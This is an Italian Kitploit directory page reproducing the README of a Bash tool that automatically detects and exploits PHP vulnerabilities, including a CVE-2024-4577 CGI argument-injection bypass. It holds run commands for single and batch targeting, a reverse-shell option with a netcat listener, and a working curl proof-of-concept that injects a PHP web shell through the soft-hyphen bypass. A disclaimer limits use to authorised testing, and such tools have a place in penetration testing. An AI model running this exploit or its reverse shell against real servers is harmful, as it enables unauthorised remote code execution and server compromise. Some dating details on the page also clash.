Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PHP_8.1.x_Exploit — Rilevamento automatizzato e sfruttamento di vulnerabilità critiche PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Strumenti/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlCrawlerStrumento di Accesso Remoto
GitHubgl1tch0x1/php_8.1.x_exploit
134 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

PHP_8.1.x_Exploit

Rilevamento automatizzato e sfruttamento di vulnerabilità critiche PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Vedi Repository
Condividi

🚀 PHP CVE Autopilot

Rilevamento e sfruttamento automatici di vulnerabilità critiche di PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh è uno strumento di valutazione della sicurezza a file singolo, zero configurazione che rileva automaticamente endpoint PHP vulnerabili e sfrutta quattro CVE ad alto impatto che interessano le versioni di PHP precedenti alla 8.1.34 (rilasciata a dicembre 2024). Non richiede alcuna creazione manuale di payload – basta fornire un URL e lo script fa il resto, dal crawling all'esecuzione remota di codice. Completamente autopilota – rileva e sfrutta automaticamente senza richieste all'utente.

Funzionalità

  • Autopilota completamente autonomo – data una singola URL, esegue crawling, fingerprinting, test e sfruttamento senza interazione da parte dell'utente.
  • Scansione batch – carica un elenco di target ed esegui in parallelo.
  • Crawling avanzato – estrae link e moduli dalla home page per un rilevamento migliore.
  • Fingerprinting di sistema operativo e versione PHP – evita attacchi solo Windows su Linux, verifica la versione di PHP.
  • Bypass CVE-2024-4577 (iniezione di argomenti CGI su Windows)
    • Rileva e sfrutta endpoint PHP-CGI vulnerabili.
    • Reverse shell opzionale (one-liner PowerShell).
    • Due varianti di iniezione: standard -d e bypass con trattino morbido %AD.
  • CVE-2025-14177 – perdita di memoria heap tramite getimagesize()
    • Crea dinamicamente un JPEG malformato e lo invia automaticamente a qualsiasi endpoint di upload rilevato.
    • Rileva la memoria trapelata nelle risposte.
  • Scansione locale approfondita via RCE (quando CVE-2024-4577 viene sfruttato)
    • Carica uno scanner PHP leggero che verifica:
      • CVE-2025-14180 – dereferenziazione di puntatore NULL in PDO PostgreSQL.
      • CVE-2025-14178 – integer overflow in array_merge.
  • Crawling intelligente – estrae link e moduli per scoprire script CGI e pagine di upload.
  • Esecuzione parallela – usa parallel se disponibile, altrimenti ripiega senza problemi.
  • Modalità verbose e debug – visualizza ogni richiesta HTTP e decisione.
  • Generazione report – salva tutti i risultati in un file di testo.
  • Pulito e sicuro – i file temporanei vengono eliminati all'uscita, i timeout prevengono i blocchi.
  • Requisiti

    DipendenzaScopoSolitamente installato?
    bash 4.0+Interprete di scriptSì (Linux/macOS)
    curlRichieste HTTPSì
    grep, sed, awkElaborazione del testoSì
    mktempCreazione di file temporaneiSì
    (opzionale) parallelScansione batch più veloceNo (ma consigliato)
    (opzionale) jqFormattazione output JSONNo

    Nessun privilegio di root richiesto – lo strumento invia solo richieste HTTP e opzionalmente esegue una reverse shell (richiede un listener sulla tua macchina).

    Installazione

    root@kitploit:~
    git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
    cd PHP_8.1.x_Exploit
    chmod +x PHP8.1.x_Exploit.sh
    

    Utilizzo

    Target singolo (più comune)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.example.com
    

    Target singolo con reverse shell (CVE-2024-4577)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444
    

    Poi sulla tua macchina:

    root@kitploit:~
    nc -lvnp 4444
    

    Scansione batch di più target

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -l targets.txt --threads 10
    

    Esempio targets.txt:

    root@kitploit:~
    http://192.168.1.1/
    https://10.0.0.5:8080/
    http://internal-app.company.com
    

    Modalità solo scansione (nessun tentativo di sfruttamento)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only
    

    Salva report su file

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt
    

    Output verbose / debug

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # very noisy
    

    Come funziona (fasi)

    FaseAzione
    1Fingerprinting – sistema operativo e versione PHP da header e probe.
    2Crawling – estrae gli attributi href e action dalla home page.
    3Scoperta CGI – prova percorsi comuni e link trovati durante il crawling che sembrano CGI.
    4Test CVE‑2024‑4577 – inietta sia payload -d che %AD; se ha successo, esegue comandi o invia una reverse shell.
    5Scoperta endpoint di upload – controlla percorsi di upload comuni e qualsiasi modulo contenente "upload"/"image".
    6Test CVE‑2025‑14177 – crea un JPEG malformato, lo invia in POST a ogni endpoint di upload, rileva perdite heap.
    7Scansione interna approfondita – se si ottiene RCE, carica uno script PHP scanner e lo esegue per testare CVE‑2025‑14180 / CVE‑2025‑14178.
    8Report – stampa un riepilogo e opzionalmente scrive su un file.

    Opzioni della riga di comando (riferimento completo)

    OpzioneDescrizione
    -u URLURL di un singolo target (es. http://example.com/)
    -l FILEFile batch con una URL per riga
    --scan-onlySolo rilevamento – non sfruttare (niente reverse shell, niente upload di payload)
    -o FILEScrive il report finale su FILE
    --threads NNumero di thread paralleli per la scansione batch (predefinito: 5)
    --timeout NTimeout HTTP in secondi (predefinito: 10)
    --no-colorDisabilita l'output colorato
    --verboseMostra avanzamento dettagliato
    --debugMostra ogni richiesta HTTP (può esporre dati sensibili)
    --revshell IP PORTTenta una reverse shell quando CVE‑2024‑4577 viene rilevata
    -h, --helpMostra l'aiuto ed esce

    CVE trattate in dettaglio

    CVEGravitàImpattoVettore di sfruttamentoCorretta in
    CVE‑2024‑4577 (bypass)CriticaRCEIniezione di argomenti CGI su Windows (mappatura trattino morbido)PHP 8.1.34
    CVE‑2025‑14177Media/AltaPerdita di informazioni (memoria heap)JPEG malformato passato a getimagesize()PHP 8.1.34
    CVE‑2025‑14180AltaDoS (dereferenziazione NULL)PDO PostgreSQL con prepared statement emulati + parametro malformato \x99PHP 8.1.34
    CVE‑2025‑14178Alta (8.2)DoS / potenziale corruzione di memoriaarray_merge() con array enormi che causa integer overflowPHP 8.1.34

    Nota: CVE‑2025‑14180 e CVE‑2025‑14178 possono essere rilevate con precisione solo dall'interno del server (test locali). Lo script raggiunge questo risultato caricando uno scanner dopo un exploit CGI riuscito.

    📸 Output di esempio

    root@kitploit:~
    [*] Scanning: http://192.168.1.100/
    [*] OS: windows
    [*] PHP version: 8.1.33
    [*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
    [✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
    [*] Attempting reverse shell to 192.168.1.5 4444
    ...
    [*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
    [-] CVE-2025-14177: Potential heap leak detected!
    ...
    [*] Running deep local scan via RCE...
    PHP_VERSION=8.1.33
    CVE-2025-14180: VULNERABLE
    CVE-2025-14178: VULNERABLE
    CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
    
    ===================== Report for http://192.168.1.100/ =====================
    OS: windows
    PHP: 8.1.33
    CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
    PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
    CVE-2025-14177: VULNERABLE
    CVE-2025-14180/14178: VULNERABLE (see deep scan output)
    ==============================================================
    

    ⚠️ Avvertenze importanti e disclaimer

    • Modalità autopilota – Lo strumento sfrutta automaticamente le vulnerabilità senza richieste. Usalo solo su target autorizzati.
    • Solo uso legale – Questo strumento è pensato per assessment di sicurezza autorizzati, penetration test e scopi educativi. Usarlo contro sistemi senza permesso è illegale nella maggior parte delle giurisdizioni.
    • Nessuna garanzia – Il software è fornito "COSÌ COM'È" senza garanzie di alcun tipo.
    • Potenziale di danni – Gli exploit possono far crashare i servizi (CVE-2025-14180) o corrompere la memoria (CVE-2025-14178). Non eseguire su sistemi di produzione senza consenso esplicito.
    • Reverse shell – L'opzione --revshell apre un socket dal target alla tua macchina. Assicurati di avere il diritto di riconnetterti.
    • Registrazione – Le tue richieste appariranno nei log di accesso/errore del target. Usa in modo responsabile.

    🛠️ Risoluzione dei problemi

    ProblemaSoluzione
    curl: command not foundInstalla curl
    GNU parallel not foundIgnorato – lo script funziona anche senza (scansioni batch più lente)
    Nessun endpoint CGI trovatoIl target potrebbe non usare CGI, oppure è dietro un WAF che blocca i flag -d
    CVE-2024-4577 funziona ma la reverse shell fallisceControlla il firewall; prova un payload più semplice con --scan-only e un listener nc manuale
    Il test di perdita immagine restituisce sempre "No leak"L'endpoint di upload potrebbe non usare getimagesize(), oppure rimuove i dati binari
    Il caricamento dello scanner locale fallisceLa document root potrebbe non essere scrivibile; lo script tenta di scrivere nella stessa directory dello script CGI

    🤝 Contributi

    Pull request, segnalazioni di bug e suggerimenti di funzionalità sono benvenuti. Si prega di seguire:

    • Mantieni lo script a file singolo e Bash puro.
    • Testa sia con parallel che senza.
    • Aggiorna questo README di conseguenza.

    📜 Licenza

    GNU General Public License v3.0 – vedi il file LICENSE.

    📚 Riferimenti

    • Annuncio di rilascio di PHP 8.1.34
    • Dettaglio CVE-2024-4577 (NVD)
    • CVE-2025-14177 / 14178 / 14180 (NVD)
    • Mappatura caratteri Best-Fit di Windows

    Creato con 🧠 per la community della sicurezza. Usalo eticamente.

    Scarica lo strumento